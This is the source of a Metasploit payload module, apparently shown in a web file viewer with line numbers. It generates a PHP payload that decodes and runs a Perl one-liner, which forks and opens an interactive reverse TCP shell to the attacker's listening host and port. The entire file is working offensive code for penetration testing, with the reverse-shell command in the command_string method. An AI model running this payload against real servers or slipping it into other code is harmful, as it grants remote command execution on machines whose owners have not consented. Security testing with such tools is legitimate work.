Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = :dynamic
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Php
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'PHP Command, Double Reverse TCP Connection (via Perl)',
18
      'Description'   => 'Creates an interactive shell via perl',
19
      'Author'        => 'cazz',
20
      'License'       => BSD_LICENSE,
21
      'Platform'      => 'php',
22
      'Arch'          => ARCH_PHP,
23
      'Handler'       => Msf::Handler::ReverseTcp,
24
      'Session'       => Msf::Sessions::CommandShell,
25
      'PayloadType'   => 'cmd',
26
      'Payload'       =>
27
        {
28
          'Offsets' => { },
29
          'Payload' => ''
30
        }
31
      ))
32
  end
33

34
  #
35
  # Constructs the payload
36
  #
37
  def generate(_opts = {})
38
    vars = Rex::RandomIdentifier::Generator.new
39
    dis = "$#{vars[:dis]}"
40
    shell = <<-END_OF_PHP_CODE
41
              #{php_preamble(disabled_varname: dis)}
42
              $c = base64_decode("#{Rex::Text.encode_base64(command_string)}");
43
              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
44
    END_OF_PHP_CODE
45
    return super + shell
46
  end
47

48
  #
49
  # Returns the command string to use for execution
50
  #
51
  def command_string
52
    lhost = datastore['LHOST']
53
    ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
54
    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
55
    cmd   = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
56
  end
57
end
58

59